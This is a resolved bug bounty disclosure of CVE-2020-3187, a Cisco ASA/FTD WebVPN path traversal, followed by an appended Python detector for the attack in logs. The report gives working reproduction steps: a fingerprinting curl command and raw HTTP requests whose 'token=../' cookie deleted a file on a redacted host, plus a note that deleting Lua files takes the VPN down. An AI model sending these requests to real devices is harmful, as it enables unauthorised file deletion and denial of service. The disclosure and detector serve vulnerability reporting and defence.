Unauthenticated Arbitrary File Deletion "CVE-2020-3187" in █████

Disclosed: 2020-11-23 18:01:30 By emad777 To deptofdefense
Critical
Vulnerability Details
**Summary:** A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files.

**Description:** Vulnerable host: `██████████`

## Impact

An exploit could allow the attacker to view or delete arbitrary files on the system.

## Step-by-step Reproduction Instructions

**1. Identify a vulnerable host by sending a request to `/+CSCOE+/session_password.html`.**

`curl -skiL "███/+CSCOE+/session_password.html"`

```
GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
```

If the target is vulnerable, the response headers will include a `webvpn` header. The request gave me the following response:

```
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:40:44 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
```

**2. Perform the exploit to delete files by adding the token to the Cookie header of the request.**

For example, I wanted to delete this file (`██████/+CSCOU+/csco_logo.gif`).

That did not work because sometimes logo.gif/png has permission issues, so try this: `█████/+CSCOE+/blank.html`. You can also delete the file `/+CSCOE+/blank.html` (an empty HTML file), as it might be a problem with the permission of the custom logo file; sometimes logo.gif has a permission issue, so we might not be able to delete it, but we can delete other files.

Request:

```
GET /+CSCOE+/blank.html HTTP/1.1
Host: ██████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
```

Response:

```
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:54:48 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 13

<HTML></HTML>
```

**3. So I exploited the CVE and deleted the blank file, as follows:**

Request:

```
GET /+CSCOE+/session_password.html HTTP/1.1
Host: █████████
Cookie: token=../+CSCOE+/blank.html
User-Agent: curl/7.47.0
Accept: */*
```

Response:

```
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:55:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
```

File deleted successfully: `curl -Ik ████/+CSCOE+/blank.html`

```
HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Wed, 04 Nov 2020 21:55:08 GMT
X-Frame-Options: SAMEORIGIN

File not found
```

Warning: This can lead to a denial of service (DoS) on the VPN by deleting the Lua source code files from the file system, which will break the WebVPN interface until the device is rebooted.

## Suggested Mitigation/Remediation Actions

Upgrade the ASA software version per the referenced advisory.

This advisory is available at the following link:

- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43

## Impact

*High - This vulnerability allows the attacker to delete files within the web services file system.*
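As an added detection example (not part of this report or of Cisco's advisory), the following Python flags the request pattern the report describes from a defender's side: a request under `/+CSCOE+/` whose `token` cookie carries a `../` traversal sequence, including URL-encoded and double-encoded forms. The log lines and their `client method path "cookie"` layout are constructed for this example and do not correspond to any real ASA log format; adapt `LINE_RE` to the proxy or WAF log you actually have.

```python
"""Flag CVE-2020-3187-style traversal in the WebVPN 'token' cookie.

Added example, not code from the HackerOne report or from Cisco. The log
lines and the "client method path \"cookie\"" layout are constructed.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed layout, not a real ASA format).
SAMPLE_LOG = [
    '198.51.100.7 GET /+CSCOE+/session_password.html "webvpnlogin=1; webvpnLang=en"',
    '198.51.100.7 GET /+CSCOE+/session_password.html "token=../+CSCOE+/blank.html"',
    '203.0.113.9 GET /+CSCOE+/session_password.html "token=..%2f..%2f+CSCOE+/blank.html"',
    '192.0.2.44 GET /+CSCOE+/logon.html "webvpnlogin=1"',
    '192.0.2.44 GET /+CSCOE+/session_password.html "token=abcdef0123"',
]

LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>\S+) (?P<path>\S+) "(?P<cookie>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def parse_cookie(header):
    """Split a Cookie header value into a name -> value dict (first '=' splits)."""
    jar = {}
    for part in header.split(";"):
        if "=" in part:
            name, _, value = part.strip().partition("=")
            jar[name.strip()] = value
    return jar


def has_traversal(value, rounds=3):
    """Percent-decode repeatedly (double encoding is common) and look for '../' or '..\\'."""
    decoded = value
    for _ in range(rounds):
        new = unquote(decoded)
        if new == decoded:
            break
        decoded = new
    return TRAVERSAL_RE.search(decoded) is not None


def classify(line):
    """Return an alert dict for a suspicious line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = m["path"]
    token = parse_cookie(m["cookie"]).get("token")
    # The report's trigger: a WebVPN request whose token cookie walks the path.
    if path.startswith("/+CSCOE+/") and token is not None and has_traversal(token):
        return {
            "client": m["client"],
            "path": path,
            "token": token,
            "alert": "traversal-in-webvpn-token-cookie",
        }
    return None


def scan(lines):
    """Run classify() over every line and keep the hits."""
    return [hit for hit in (classify(line) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only lines two and three produce alerts: the benign fingerprinting request in line one and the ordinary-looking token in line five are left alone, so the rule keys on the traversal rather than on the path being visited. Pair it with the `webvpn` response header the report notes as the fingerprint if you want to confirm which devices answered.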
Report Stats
  • Report ID: 1026265
  • State: Closed
  • Substate: resolved
  • Upvotes: 9